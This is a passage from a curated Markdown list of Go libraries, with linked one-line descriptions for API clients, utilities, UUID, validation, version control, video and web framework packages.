- [go-sptrans](https://github.com/sergioaugrod/go-sptrans) - Go client library for the SPTrans Olho Vivo API.
- [go-swagger-ui](https://github.com/esurdam/go-swagger-ui) - Go library containing precompiled [Swagger UI](https://swagger.io/tools/swagger-ui/) for serving swagger json.
- [go-telegraph](https://gitlab.com/toby3d/telegraph) - Telegraph publishing platform API client.
- [go-trending](https://github.com/andygrunwald/go-trending) - Go library for accessing [trending repositories](https://github.com/trending) and [developers](https://github.com/trending/developers) at Github.
- [go-twitter](https://github.com/dghubble/go-twitter) - Go client library for the Twitter v1.1 APIs.
- [go-unsplash](https://github.com/hbagdi/go-unsplash) - Go client library for the [Unsplash.com](https://unsplash.com) API.
- [go-xkcd](https://github.com/nishanths/go-xkcd) - Go client for the xkcd API.
- [go-yapla](https://git.iglou.eu/Production/go-yapla) - Go client library for the Yapla v2.0 API.
- [goagi](https://github.com/staskobzar/goagi) - Go library to build Asterisk PBX agi/fastagi applications.
- [goami2](https://github.com/staskobzar/goami2) - AMI v2 library for Asterisk PBX.
- [GoFreeDB](https://github.com/FreeLeh/GoFreeDB) - Golang library providing common and simple database abstractions on top of Google Sheets.
- [gogtrends](https://github.com/groovili/gogtrends) - Google Trends Unofficial API.
- [golang-tmdb](https://github.com/cyruzin/golang-tmdb) - Golang wrapper for The Movie Database API v3.
- [golyrics](https://github.com/mamal72/golyrics) - Golyrics is a Go library to fetch music lyrics data from the Wikia website.
- [gomalshare](https://github.com/MonaxGT/gomalshare) - Go library MalShare API [malshare.com](https://www.malshare.com/)
- [GoMusicBrainz](https://github.com/michiwend/gomusicbrainz) - Go MusicBrainz WS2 client library.
- [google](https://github.com/google/google-api-go-client) - Auto-generated Google APIs for Go.
- [google-analytics](https://github.com/chonthu/go-google-analytics) - Simple wrapper for easy google analytics reporting.
- [google-cloud](https://github.com/GoogleCloudPlatform/gcloud-golang) - Google Cloud APIs Go Client Library.
- [google-email-audit-api](https://github.com/ngs/go-google-email-audit-api) - Go client library for [Google G Suite Email Audit API](https://developers.google.com/admin-sdk/email-audit/).
- [google-play-scraper](https://github.com/n0madic/google-play-scraper) - Get data from Google Play Store.
- [gopaapi5](https://github.com/utekaravinash/gopaapi5) - Go Client Library for [Amazon Product Advertising API 5.0](https://webservices.amazon.com/paapi5/documentation/).
- [gosip](https://github.com/koltyakov/gosip) - Client library for SharePoint.
- [gostorm](https://github.com/jsgilmore/gostorm) - GoStorm is a Go library that implements the communications protocol required to write Storm spouts and Bolts in Go that communicate with the Storm shells.
- [hipchat](https://github.com/andybons/hipchat) - This project implements a golang client library for the Hipchat API.
- [hipchat (xmpp)](https://github.com/daneharrigan/hipchat) - A golang package to communicate with HipChat over XMPP.
- [igdb](https://github.com/Henry-Sarabia/igdb) - Go client for the [Internet Game Database API](https://api.igdb.com/).
- [jokeapi-go](https://github.com/icelain/jokeapi) - Go client for [JokeAPI](https://sv443.net/jokeapi/v2/).
- [lark](https://github.com/chyroc/lark) - [Feishu](https://open.feishu.cn/)/[Lark](https://open.larksuite.com/) Open API Go SDK, Support ALL Open API and Event Callback.
- [lastpass-go](https://github.com/ansd/lastpass-go) - Go client library for the [LastPass](https://www.lastpass.com/) API.
- [libgoffi](https://github.com/clevabit/libgoffi) - Library adapter toolbox for native [libffi](https://sourceware.org/libffi/) integration
- [Medium](https://github.com/Medium/medium-sdk-go) - Golang SDK for Medium's OAuth2 API.
- [megos](https://github.com/andygrunwald/megos) - Client library for accessing an [Apache Mesos](https://mesos.apache.org/) cluster.
- [minio-go](https://github.com/minio/minio-go) - Minio Go Library for Amazon S3 compatible cloud storage.
- [mixpanel](https://github.com/dukex/mixpanel) - Mixpanel is a library for tracking events and sending Mixpanel profile updates to Mixpanel from your go applications.
- [newsapi-go](https://github.com/jellydator/newsapi-go) - Go client for [NewsAPI](https://newsapi.org/).
- [openaigo](https://github.com/otiai10/openaigo) - OpenAI GPT3/GPT3.5 ChatGPT API client library for Go.
- [patreon-go](https://github.com/mxpv/patreon-go) - Go library for Patreon API.
- [paypal](https://github.com/logpacker/PayPal-Go-SDK) - Wrapper for PayPal payment API.
- [playlyfe](https://github.com/playlyfe/playlyfe-go-sdk) - The Playlyfe Rest API Go SDK.
- [pushover](https://github.com/gregdel/pushover) - Go wrapper for the Pushover API.
- [rawg-sdk-go](https://github.com/dimuska139/rawg-sdk-go) - Go library for the [RAWG Video Games Database](https://rawg.io/) API
- [rrdaclient](https://github.com/Omie/rrdaclient) - Go Library to access statdns.com API, which is in turn RRDA API. DNS Queries over HTTP.
- [shopify](https://github.com/rapito/go-shopify) - Go Library to make CRUD request to the Shopify API.
- [simples3](https://github.com/rhnvrm/simples3) - Simple no frills AWS S3 Library using REST with V4 Signing written in Go.
- [slack](https://github.com/slack-go/slack) - Slack API in Go.
- [smite](https://github.com/sergiotapia/smitego) - Go package to wraps access to the Smite game API.
- [spotify](https://github.com/rapito/go-spotify) - Go Library to access Spotify WEB API.
- [steam](https://github.com/sostronk/go-steam) - Go Library to interact with Steam game servers.
- [stripe](https://github.com/stripe/stripe-go) - Go client for the Stripe API.
- [swag](https://github.com/zc2638/swag) - No comments, simple go wrapper to create swagger 2.0 compatible APIs. Support most routing frameworks, such as built-in, gin, chi, mux, echo, httprouter, fasthttp and more.
- [textbelt](https://github.com/dietsche/textbelt) - Go client for the textbelt.com txt messaging API.
- [translate](https://github.com/poorny/translate) - Go online translation package.
- [Trello](https://github.com/adlio/trello) - Go wrapper for the Trello API.
- [TripAdvisor](https://github.com/mrbenosborne/tripadvisor-golang) - Go wrapper for the TripAdvisor API.
- [tumblr](https://github.com/mattcunningham/gumblr) - Go wrapper for the Tumblr v2 API.
- [twitter-scraper](https://github.com/n0madic/twitter-scraper) - Scrape the Twitter Frontend API without authentication and limits.
- [uptimerobot](https://github.com/bitfield/uptimerobot) - Go wrapper and command-line client for the Uptime Robot v2 API.
- [vl-go](https://github.com/verifid/vl-go) - Go client library around the VerifID identity verification layer API.
- [webhooks](https://github.com/go-playground/webhooks) - Webhook receiver for GitHub and Bitbucket.
- [wit-go](https://github.com/wit-ai/wit-go) - Go client for wit.ai HTTP API.
- [ynab](https://github.com/brunomvsouza/ynab.go) - Go wrapper for the YNAB API.
- [zooz](https://github.com/gojuno/go-zooz) - Go client for the Zooz API.
**[⬆ back to top](#contents)**
## Utilities
_General utilities and tools to make your life easier._
- [apm](https://github.com/topfreegames/apm) - Process manager for Golang applications with an HTTP API.
- [backscanner](https://github.com/icza/backscanner) - A scanner similar to bufio.Scanner, but it reads and returns lines in reverse order, starting at a given position and going backward.
- [beyond](https://github.com/wesovilabs/beyond) - The Go tool that will drive you to the AOP world!
- [blank](https://github.com/Henry-Sarabia/blank) - Verify or remove blanks and whitespace from strings.
- [bleep](https://github.com/sinhashubham95/bleep) - Perform any number of actions on any set of OS signals in Go.
- [boilr](https://github.com/tmrts/boilr) - Blazingly fast CLI tool for creating projects from boilerplate templates.
- [changie](https://github.com/miniscruff/changie) - Automated changelog tool for preparing releases with lots of customization options.
- [chyle](https://github.com/antham/chyle) - Changelog generator using a git repository with multiple configuration possibilities.
- [circuit](https://github.com/cep21/circuit) - An efficient and feature complete Hystrix like Go implementation of the circuit breaker pattern.
- [circuitbreaker](https://github.com/rubyist/circuitbreaker) - Circuit Breakers in Go.
- [clipboard](https://github.com/golang-design/clipboard) - 📋 cross-platform clipboard package in Go.
- [clockwork](https://github.com/jonboulle/clockwork) - A simple fake clock for golang.
- [cmd](https://github.com/SimonBaeumer/cmd) - Library for executing shell commands on osx, windows and linux.
- [command](https://github.com/txgruppi/command) - Command pattern for Go with thread safe serial and parallel dispatcher.
- [contextplus](https://github.com/contextplus/contextplus) - Package contextplus provide more easy to use functions for contexts.
- [copy](https://github.com/gotidy/copy) - Package for fast copying structs of different types.
- [copy-pasta](https://github.com/jutkko/copy-pasta) - Universal multi-workstation clipboard that uses S3 like backend for the storage.
- [countries](https://github.com/biter777/countries) - Full implementation of ISO-3166-1, ISO-4217, ITU-T E.164, Unicode CLDR and IANA ccTLD standards.
- [countries](https://github.com/pioz/countries) - All you need when you are working with countries in Go.
- [create-go-app](https://github.com/create-go-app/cli) - A powerful CLI for create a new production-ready project with backend (Golang), frontend (JavaScript, TypeScript) & deploy automation (Ansible, Docker) by running one command.
- [cryptgo](https://github.com/Gituser143/cryptgo) - Crytpgo is a TUI based application written purely in Go to monitor and observe cryptocurrency prices in real time!
- [ctop](https://github.com/bcicen/ctop) - [Top-like](https://ctop.sh) interface (e.g. htop) for container metrics.
- [ctxutil](https://github.com/posener/ctxutil) - A collection of utility functions for contexts.
- [cvt](https://github.com/shockerli/cvt) - Easy and safe convert any value to another type.
- [dbt](https://github.com/nikogura/dbt) - A framework for running self-updating signed binaries from a central, trusted repository.
- [Death](https://github.com/vrecan/death) - Managing go application shutdown with signals.
- [Deepcopier](https://github.com/ulule/deepcopier) - Simple struct copying for Go.
- [delve](https://github.com/derekparker/delve) - Go debugger.
- [dive](https://github.com/wagoodman/dive) - A tool for exploring each layer in a Docker image.
- [dlog](https://github.com/kirillDanshin/dlog) - Compile-time controlled logger to make your release smaller without removing debug calls.
- [EaseProbe](https://github.com/megaease/easeprobe) - A simple, standalone, and lightWeight tool that can do health/status checking daemon, support HTTP/TCP/SSH/Shell/Client/... probes, and Slack/Discord/Telegram/SMS... notification.
- [equalizer](https://github.com/reugn/equalizer) - Quota manager and rate limiter collection for Go.
- [ergo](https://github.com/cristianoliveira/ergo) - The management of multiple local services running over different ports made easy.
- [evaluator](https://github.com/nullne/evaluator) - Evaluate an expression dynamically based on s-expression. It's simple and easy to extend.
- [filetype](https://github.com/h2non/filetype) - Small package to infer the file type checking the magic numbers signature.
- [filler](https://github.com/yaronsumel/filler) - small utility to fill structs using "fill" tag.
- [filter](https://github.com/gookit/filter) - provide filtering, sanitizing, and conversion of Go data.
- [fzf](https://github.com/junegunn/fzf) - Command-line fuzzy finder written in Go.
- [generate](https://github.com/go-playground/generate) - runs go generate recursively on a specified path or environment variable and can filter by regex.
- [ghokin](https://github.com/antham/ghokin) - Parallelized formatter with no external dependencies for gherkin (cucumber, behat...).
- [git-time-metric](https://github.com/git-time-metric/gtm) - Simple, seamless, lightweight time tracking for Git.
- [gitbatch](https://github.com/isacikgoz/gitbatch) - manage your git repositories in one place.
- [go-actuator](https://github.com/sinhashubham95/go-actuator) - Production ready features for Go based web frameworks.
- [go-astitodo](https://github.com/asticode/go-astitodo) - Parse TODOs in your GO code.
- [go-bind-plugin](https://github.com/wendigo/go-bind-plugin) - go:generate tool for wrapping symbols exported by golang plugins (1.8 only).
- [go-bsdiff](https://github.com/gabstv/go-bsdiff) - Pure Go bsdiff and bspatch libraries and CLI tools.
- [go-clip](https://github.com/prashantgupta24/go-clip) - A minimalistic clipboard manager for Mac.
- [go-convert](https://github.com/Eun/go-convert) - Package go-convert enables you to convert a value into another type.
- [go-countries](https://github.com/mikekonan/go-countries) - Lightweight lookup over ISO-3166 codes.
- [go-dry](https://github.com/ungerik/go-dry) - DRY (don't repeat yourself) package for Go.
- [go-funk](https://github.com/thoas/go-funk) - Modern Go utility library which provides helpers (map, find, contains, filter, chunk, reverse, ...).
- [go-health](https://github.com/Talento90/go-health) - Health package simplifies the way you add health check to your services.
- [go-httpheader](https://github.com/mozillazg/go-httpheader) - Go library for encoding structs into Header fields.
- [go-lock](https://github.com/viney-shih/go-lock) - go-lock is a lock library implementing read-write mutex and read-write trylock without starvation.
- [go-pkg](https://github.com/chenquan/go-pkg) - A go toolkit.
- [go-problemdetails](https://github.com/mvmaasakkers/go-problemdetails) - Go package for working with Problem Details.
- [go-rate](https://github.com/beefsack/go-rate) - Timed rate limiter for Go.
- [go-sitemap-generator](https://github.com/ikeikeikeike/go-sitemap-generator) - XML Sitemap generator written in Go.
- [go-trigger](https://github.com/sadlil/go-trigger) - Go-lang global event triggerer, Register Events with an id and trigger the event from anywhere from your project.
- [go-type](https://github.com/mikekonan/go-types) - Library providing Go types for store/validation and transfer of ISO-4217, ISO-3166, and other types.
- [goback](https://github.com/carlescere/goback) - Go simple exponential backoff package.
- [goctx](https://github.com/zerosnake0/goctx) - Get your context value with high performance.
- [godaemon](https://github.com/VividCortex/godaemon) - Utility to write daemons.
- [godropbox](https://github.com/dropbox/godropbox) - Common libraries for writing Go services/applications from Dropbox.
- [gofn](https://github.com/tiendc/gofn) - High performance utitlity functions written using Generics for Go 1.18+.
- [gohper](https://github.com/cosiner/gohper) - Various tools/modules help for development.
- [golarm](https://github.com/msempere/golarm) - Fire alarms with system events.
- [golog](https://github.com/mlimaloureiro/golog) - Easy and lightweight CLI tool to time track your tasks.
- [gopencils](https://github.com/bndr/gopencils) - Small and simple package to easily consume REST APIs.
- [goplaceholder](https://github.com/michiwend/goplaceholder) - a small golang lib to generate placeholder images.
- [goreadability](https://github.com/philipjkim/goreadability) - Webpage summary extractor using Facebook Open Graph and arc90's readability.
- [goreleaser](https://github.com/goreleaser/goreleaser) - Deliver Go binaries as fast and easily as possible.
- [goreporter](https://github.com/wgliang/goreporter) - Golang tool that does static analysis, unit testing, code review and generate code quality report.
- [goseaweedfs](https://github.com/linxGnu/goseaweedfs) - SeaweedFS client library with almost full features.
- [gostrutils](https://github.com/ik5/gostrutils) - Collections of string manipulation and conversion functions.
- [gotenv](https://github.com/subosito/gotenv) - Load environment variables from `.env` or any `io.Reader` in Go.
- [goval](https://github.com/maja42/goval) - Evaluate arbitrary expressions in Go.
- [gpath](https://github.com/tenntenn/gpath) - Library to simplify access struct fields with Go's expression in reflection.
- [graterm](https://github.com/skovtunenko/graterm) - Provides primitives to perform ordered (sequential/concurrent) GRAceful TERMination (aka shutdown) in Go application.
- [grofer](https://github.com/pesos/grofer) - A system and resource monitoring tool written in Golang!
- [gubrak](https://github.com/novalagung/gubrak) - Golang utility library with syntactic sugar. It's like lodash, but for golang.
- [handy](https://github.com/miguelpragier/handy) - Many utilities and helpers like string handlers/formatters and validators.
- [hostctl](https://github.com/guumaster/hostctl) - A CLI tool to manage /etc/hosts with easy commands.
- [htcat](https://github.com/htcat/htcat) - Parallel and Pipelined HTTP GET Utility.
- [hub](https://github.com/github/hub) - wrap git commands with additional functionality to interact with github from the terminal.
- [hystrix-go](https://github.com/afex/hystrix-go) - Implements Hystrix patterns of programmer-defined fallbacks aka circuit breaker.
- [immortal](https://github.com/immortal/immortal) - \*nix cross-platform (OS agnostic) supervisor.
- [intrinsic](https://github.com/mengzhuo/intrinsic) - Use x86 SIMD without writing any assembly code.
- [jsend](https://github.com/clevergo/jsend) - JSend's implementation written in Go.
- [jump](https://github.com/gsamokovarov/jump) - Jump helps you navigate faster by learning your habits.
- [just](https://github.com/kazhuravlev/just) - Just a collection of useful functions for working with generic data structures.
- [koazee](https://github.com/wesovilabs/koazee) - Library inspired in Lazy evaluation and functional programming that takes the hassle out of working with arrays.
- [lancet](https://github.com/duke-git/lancet) - A comprehensive, efficient, and reusable util function library of go.
- [lets-go](https://github.com/aplescia-chwy/lets-go) - Go module that provides common utilities for Cloud Native REST API development. Also contains AWS Specific utilities.
- [limiters](https://github.com/mennanov/limiters) - Rate limiters for distributed applications in Golang with configurable back-ends and distributed locks.
- [lo](https://github.com/samber/lo) - A Lodash like Go library based on Go 1.18+ Generics (map, filter, contains, find...)
- [loncha](https://github.com/kazu/loncha) - A high-performance slice Utilities.
- [lrserver](https://github.com/jaschaephraim/lrserver) - LiveReload server for Go.
- [mani](https://github.com/alajmo/mani) - CLI tool to help you manage multiple repositories.
- [mc](https://github.com/minio/mc) - Minio Client provides minimal tools to work with Amazon S3 compatible cloud storage and filesystems.
- [mergo](https://github.com/imdario/mergo) - Helper to merge structs and maps in Golang. Useful for configuration default values, avoiding messy if-statements.
- [mimemagic](https://github.com/zRedShift/mimemagic) - Pure Go ultra performant MIME sniffing library/utility.
- [mimesniffer](https://github.com/aofei/mimesniffer) - A MIME type sniffer for Go.
- [mimetype](https://github.com/gabriel-vasile/mimetype) - Package for MIME type detection based on magic numbers.
- [minify](https://github.com/tdewolff/minify) - Fast minifiers for HTML, CSS, JS, XML, JSON and SVG file formats.
- [minquery](https://github.com/icza/minquery) - MongoDB / mgo.v2 query that supports efficient pagination (cursors to continue listing documents where we left off).
- [moldova](https://github.com/StabbyCutyou/moldova) - Utility for generating random data based on an input template.
- [mole](https://github.com/davrodpin/mole) - cli app to easily create ssh tunnels.
- [mongo-go-pagination](https://github.com/gobeam/mongo-go-pagination) - Mongodb Pagination for official mongodb/mongo-go-driver package which supports both normal queries and Aggregation pipelines.
- [mssqlx](https://github.com/linxGnu/mssqlx) - Database client library, proxy for any master slave, master master structures. Lightweight and auto balancing in mind.
- [multitick](https://github.com/VividCortex/multitick) - Multiplexor for aligned tickers.
- [myhttp](https://github.com/inancgumus/myhttp) - Simple API to make HTTP GET requests with timeout support.
- [netbug](https://github.com/e-dard/netbug) - Easy remote profiling of your services.
- [nfdump](https://github.com/chrispassas/nfdump) - Read nfdump netflow files.
- [nostromo](https://github.com/pokanop/nostromo) - CLI for building powerful aliases.
- [objwalker](https://github.com/rekby/objwalker) - Walk by go objects with reflection.
- [okrun](https://github.com/xta/okrun) - go run error steamroller.
- [olaf](https://github.com/btnguyen2k/olaf) - Twitter Snowflake implemented in Go.
- [onecache](https://github.com/adelowo/onecache) - Caching library with support for multiple backend stores (Redis, Memcached, filesystem etc).
- [panicparse](https://github.com/maruel/panicparse) - Groups similar goroutines and colorizes stack dump.
- [pattern-match](https://github.com/alexpantyukhin/go-pattern-match) - Pattern matching library.
- [peco](https://github.com/peco/peco) - Simplistic interactive filtering tool.
- [pgo](https://github.com/arthurkushman/pgo) - Convenient functions for PHP community.
- [pm](https://github.com/VividCortex/pm) - Process (i.e. goroutine) manager with an HTTP API.
- [pointer](https://github.com/xorcare/pointer) - Package pointer contains helper routines for simplifying the creation of optional fields of basic type.
- [ptr](https://github.com/gotidy/ptr) - Package that provide functions for simplified creation of pointers from constants of basic types.
- [rclient](https://github.com/zpatrick/rclient) - Readable, flexible, simple-to-use client for REST APIs.
- [reflectutils](https://github.com/muir/reflectutils) - Helpers for working with reflection: struct tag parsing; recursive walking; fill value from string.
- [remote-touchpad](https://github.com/Unrud/remote-touchpad) - Control mouse and keyboard from a smartphone.
- [repeat](https://github.com/ssgreg/repeat) - Go implementation of different backoff strategies useful for retrying operations and heartbeating.
- [request](https://github.com/mozillazg/request) - Go HTTP Requests for Humans™.
- [rerun](https://github.com/ivpusic/rerun) - Recompiling and rerunning go apps when source changes.
- [rest-go](https://github.com/edermanoel94/rest-go) - A package that provide many helpful methods for working with rest api.
- [retry](https://github.com/kamilsk/retry) - The most advanced functional mechanism to perform actions repetitively until successful.
- [retry](https://github.com/percolate/retry) - A simple but highly configurable retry package for Go.
- [retry](https://github.com/thedevsaddam/retry) - Simple and easy retry mechanism package for Go.
- [retry](https://github.com/shafreeck/retry) - A pretty simple library to ensure your work to be done.
- [retry-go](https://github.com/avast/retry-go) - Simple library for retry mechanism.
- [retry-go](https://github.com/rafaeljesus/retry-go) - Retrying made simple and easy for golang.
- [robustly](https://github.com/VividCortex/robustly) - Runs functions resiliently, catching and restarting panics.
- [rospo](https://github.com/ferama/rospo) - Simple and reliable ssh tunnels with embedded ssh server in Golang.
- [scan](https://github.com/blockloop/scan) - Scan golang `sql.Rows` directly to structs, slices, or primitive types.
- [scan](https://github.com/wroge/scan) - Scan sql rows into any type powered by generics.
- [scany](https://github.com/georgysavva/scany) - Library for scanning data from a database into Go structs and more.
- [serve](https://github.com/syntaqx/serve) - A static http server anywhere you need.
- [set](https://github.com/nofeaturesonlybugs/set) - Performant and flexible struct mapping and loose type conversion.
- [shutdown](https://github.com/ztrue/shutdown) - App shutdown hooks for `os.Signal` handling.
- [silk](https://github.com/chrispassas/silk) - Read silk netflow files.
- [slice](https://github.com/psampaz/slice) - Type-safe functions for common Go slice operations.
- [sliceconv](https://github.com/Henry-Sarabia/sliceconv) - Slice conversion between primitive types.
- [slicer](https://github.com/leaanthony/slicer) - Makes working with slices easier.
- [sorty](https://github.com/jfcg/sorty) - Fast Concurrent / Parallel Sorting.
- [sqlx](https://github.com/jmoiron/sqlx) - provides a set of extensions on top of the excellent built-in database/sql package.
- [sshman](https://github.com/shoobyban/sshman) - SSH Manager for authorized_keys files on multiple remote servers.
- [statiks](https://github.com/janiltonmaciel/statiks) - Fast, zero-configuration, static HTTP filer server.
- [Storm](https://github.com/asdine/storm) - Simple and powerful toolkit for BoltDB.
- [structs](https://github.com/PumpkinSeed/structs) - Implement simple functions to manipulate structs.
- [throttle](https://github.com/yudppp/throttle) - Throttle is an object that will perform exactly one action per duration.
- [tik](https://github.com/andy2046/tik) - Simple and easy timing wheel package for Go.
- [tome](https://github.com/cyruzin/tome) - Tome was designed to paginate simple RESTful APIs.
- [toolbox](https://github.com/viant/toolbox) - Slice, map, multimap, struct, function, data conversion utilities. Service router, macro evaluator, tokenizer.
- [ugo](https://github.com/alxrm/ugo) - ugo is slice toolbox with concise syntax for Go.
- [UNIS](https://github.com/esemplastic/unis) - Common Architecture™ for String Utilities in Go.
- [usql](https://github.com/knq/usql) - usql is a universal command-line interface for SQL databases.
- [util](https://github.com/shomali11/util) - Collection of useful utility functions. (strings, concurrency, manipulations, ...).
- [watchhttp](https://github.com/nikolaydubina/watchhttp) - Run command periodically and expose latest STDOUT or its rich delta as HTTP endpoint.
- [wifiqr](https://github.com/reugn/wifiqr) - Wi-Fi QR Code Generator.
- [wuzz](https://github.com/asciimoo/wuzz) - Interactive cli tool for HTTP inspection.
- [xferspdy](https://github.com/monmohan/xferspdy) - Xferspdy provides binary diff and patch library in golang.
**[⬆ back to top](#contents)**
## UUID
_Libraries for working with UUIDs._
- [goid](https://github.com/jakehl/goid) - Generate and Parse RFC4122 compliant V4 UUIDs.
- [gouid](https://github.com/twharmon/gouid) - Generate cryptographically secure random string IDs with just one allocation.
- [nanoid](https://github.com/aidarkhanov/nanoid) - A tiny and efficient Go unique string ID generator.
- [sno](https://github.com/muyo/sno) - Compact, sortable and fast unique IDs with embedded metadata.
- [ulid](https://github.com/oklog/ulid) - Go implementation of ULID (Universally Unique Lexicographically Sortable Identifier).
- [uniq](https://gitlab.com/skilstak/code/go/uniq) - No hassle safe, fast unique identifiers with commands.
- [uuid](https://github.com/agext/uuid) - Generate, encode, and decode UUIDs v1 with fast or cryptographic-quality random node identifier.
- [uuid](https://github.com/gofrs/uuid) - Implementation of Universally Unique Identifier (UUID). Supports both creation and parsing of UUIDs. Actively maintained fork of satori uuid.
- [uuid](https://github.com/google/uuid) - Go package for UUIDs based on RFC 4122 and DCE 1.1: Authentication and Security Services.
- [wuid](https://github.com/edwingeng/wuid) - An extremely fast globally unique number generator.
- [xid](https://github.com/rs/xid) - Xid is a globally unique id generator library, ready to be safely used directly in your server code.
**[⬆ back to top](#contents)**
## Validation
_Libraries for validation._
- [checkdigit](https://github.com/osamingo/checkdigit) - Provide check digit algorithms (Luhn, Verhoeff, Damm) and calculators (ISBN, EAN, JAN, UPC, etc.).
- [gody](https://github.com/guiferpa/gody) - :balloon: A lightweight struct validator for Go.
- [govalid](https://github.com/twharmon/govalid) - Fast, tag-based validation for structs.
- [govalidator](https://github.com/asaskevich/govalidator) - Validators and sanitizers for strings, numerics, slices and structs.
- [govalidator](https://github.com/thedevsaddam/govalidator) - Validate Golang request data with simple rules. Highly inspired by Laravel's request validation.
- [jio](https://github.com/faceair/jio) - jio is a json schema validator similar to [joi](https://github.com/hapijs/joi).
- [ozzo-validation](https://github.com/go-ozzo/ozzo-validation) - Supports validation of various data types (structs, strings, maps, slices, etc.) with configurable and extensible validation rules specified in usual code constructs instead of struct tags.
- [validate](https://github.com/gookit/validate) - Go package for data validation and filtering. support validate Map, Struct, Request(Form, JSON, url.Values, Uploaded Files) data and more features.
- [validate](https://github.com/gobuffalo/validate) - This package provides a framework for writing validations for Go applications.
- [validator](https://github.com/go-playground/validator) - Go Struct and Field validation, including Cross Field, Cross Struct, Map, Slice and Array diving.
- [Validator](https://github.com/go-the-way/validator) - A lightweight model validator written in Go.Contains VFs:Min, Max, MinLength, MaxLength, Length, Enum, Regex.
- [valix](https://github.com/marrow16/valix) Go package for validating requests
**[⬆ back to top](#contents)**
## Version Control
_Libraries for version control._
- [cli](https://gitlab.com/gitlab-org/cli) - An open-source GitLab command line tool bringing GitLab's cool features to your command line.
- [froggit-go](https://github.com/jfrog/froggit-go) - Froggit-Go is a Go library, allowing to perform actions on VCS providers.
- [gh](https://github.com/rjeczalik/gh) - Scriptable server and net/http middleware for GitHub Webhooks.
- [git2go](https://github.com/libgit2/git2go) - Go bindings for libgit2.
- [githooks](https://github.com/gabyx/githooks) - Per-repo and shared Git hooks with version control and auto update.
- [go-git](https://github.com/go-git/go-git) - highly extensible Git implementation in pure Go.
- [go-vcs](https://github.com/sourcegraph/go-vcs) - manipulate and inspect VCS repositories in Go.
- [hercules](https://github.com/src-d/hercules) - gaining advanced insights from Git repository history.
- [hgo](https://github.com/beyang/hgo) - Hgo is a collection of Go packages providing read-access to local Mercurial repositories.
**[⬆ back to top](#contents)**
## Video
_Libraries for manipulating video._
- [gmf](https://github.com/3d0c/gmf) - Go bindings for FFmpeg av\* libraries.
- [go-astisub](https://github.com/asticode/go-astisub) - Manipulate subtitles in GO (.srt, .stl, .ttml, .webvtt, .ssa/.ass, teletext, .smi, etc.).
- [go-astits](https://github.com/asticode/go-astits) - Parse and demux MPEG Transport Streams (.ts) natively in GO.
- [go-m3u8](https://github.com/etherlabsio/go-m3u8) - Parser and generator library for Apple m3u8 playlists. Actively maintained version of quangngotan95/go-m3u8 with improvements and latest HLS playlist parsing compatibility.
- [go-mpd](https://github.com/unki2aut/go-mpd) - Parser and generator library for MPEG-DASH manifest files.
- [goav](https://github.com/giorgisio/goav) - Comprehensive Go bindings for FFmpeg.
- [gortsplib](https://github.com/aler9/gortsplib) - Pure Go RTSP server and client library.
- [gst](https://github.com/ziutek/gst) - Go bindings for GStreamer.
- [libgosubs](https://github.com/wargarblgarbl/libgosubs) - Subtitle format support for go. Supports .srt, .ttml, and .ass.
- [libvlc-go](https://github.com/adrg/libvlc-go) - Go bindings for libvlc 2.X/3.X/4.X (used by the VLC media player).
- [m3u8](https://github.com/grafov/m3u8) - Parser and generator library of M3U8 playlists for Apple HLS.
- [v4l](https://github.com/korandiz/v4l) - Video capture library for Linux, written in Go.
**[⬆ back to top](#contents)**
## Web Frameworks
_Full stack web frameworks._
- [aah](https://aahframework.org) - Scalable, performant, rapid development Web framework for Go.
- [Aero](https://github.com/aerogo/aero) - High-performance web framework for Go, reaches top scores in Lighthouse.
- [Air](https://github.com/aofei/air) - An ideally refined web framework for Go.
- [anoweb](https://github.com/go-the-way/anoweb) - The lightweight and powerful web framework using the new way for Go.Another go the way.
- [appy](https://github.com/appist/appy) - An opinionated productive web framework that helps scaling business easier.
- [Atreugo](https://github.com/savsgio/atreugo) - High performance and extensible micro web framework with zero memory allocations in hot paths.
- [Banjo](https://github.com/nsheremet/banjo) - Very simple and fast web framework for Go.
- [Beego](https://github.com/beego/beego) - beego is an open-source, high-performance web framework for the Go programming language.
- [Buffalo](https://gobuffalo.io) - Bringing the productivity of Rails to Go!
- [Confetti Framework](https://confetti-framework.github.io/docs/) - Confetti is a Go web application framework with an expressive, elegant syntax. Confetti combines the elegance of Laravel and the simplicity of Go.
- [Don](https://github.com/abemedia/go-don) - A highly performant and simple to use API framework.
- [Echo](https://github.com/labstack/echo) - High performance, minimalist Go web framework.
- [Fiber](https://github.com/gofiber/fiber) - An Express.js inspired web framework build on Fasthttp.
- [Fireball](https://github.com/zpatrick/fireball) - More "natural" feeling web framework.
- [Flamingo](https://github.com/i-love-flamingo/flamingo) - Framework for pluggable web projects. Including a concept for modules and offering features for DI, Configareas, i18n, template engines, graphql, observability, security, events, routing & reverse routing etc.
- [Flamingo Commerce](https://github.com/i-love-flamingo/flamingo-commerce) - Providing e-commerce features using clean architecture like DDD and ports and adapters, that you can use to build flexible e-commerce applications.
- [Gearbox](https://github.com/abahmed/gearbox) - A web framework written in Go with a focus on high performance and memory optimization.
- [Gin](https://github.com/gin-gonic/gin) - Gin is a web framework written in Go! It features a martini-like API with much better performance, up to 40 times faster. If you need performance and good productivity.
- [Ginrpc](https://github.com/xxjwxc/ginrpc) - Gin parameter automatic binding tool,gin rpc tools.
- [Gizmo](https://github.com/NYTimes/gizmo) - Microservice toolkit used by the New York Times.
- [go-json-rest](https://github.com/ant0ine/go-json-rest) - Quick and easy way to setup a RESTful JSON API.
- [go-rest](https://github.com/ungerik/go-rest) - Small and evil REST framework for Go.
- [Goa](https://github.com/goadesign/goa) - Goa provides a holistic approach for developing remote APIs and microservices in Go.
- [goa](https://github.com/goa-go/goa) - goa is just like koajs for golang, it is a flexible, light, high-performance and extensible web framework based on middleware.
- [GoFrame](https://github.com/gogf/gf) - GoFrame is a modular, full-featured and production-ready application development framework of golang.
- [golamb](https://github.com/twharmon/golamb) - Golamb makes it easier to write API endpoints for use with AWS Lambda and API Gateway.
- [Golax](https://github.com/fulldump/golax) - A non Sinatra fast HTTP framework with support for Google custom methods, deep interceptors, recursion and more.
- [Golf](https://github.com/dinever/golf) - Golf is a fast, simple and lightweight micro-web framework for Go. It comes with powerful features and has no dependencies other than the Go Standard Library.
- [Gondola](https://github.com/rainycape/gondola) - The web framework for writing faster sites, faster.
- [gongular](https://github.com/mustafaakin/gongular) - Fast Go web framework with input mapping/validation and (DI) Dependency Injection.
- [GoTuna](https://github.com/gotuna/gotuna) - Minimalistic web framework for Go with mux router, middlewares, sessions, templates, embedded views and static files.
- [goweb](https://github.com/twharmon/goweb) - Web framework with routing, websockets, logging, middleware, static file server (optional gzip), and automatic TLS.
